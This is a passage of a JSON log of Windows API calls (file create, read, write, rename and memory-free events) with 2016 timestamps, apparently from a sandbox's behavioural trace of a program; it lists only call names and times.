"filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,309", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,319", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,349", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,359", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,379", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,389", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:53,389", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,399", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,409", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,409", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,419", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,429", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,449", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,459", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:53,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,529", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": 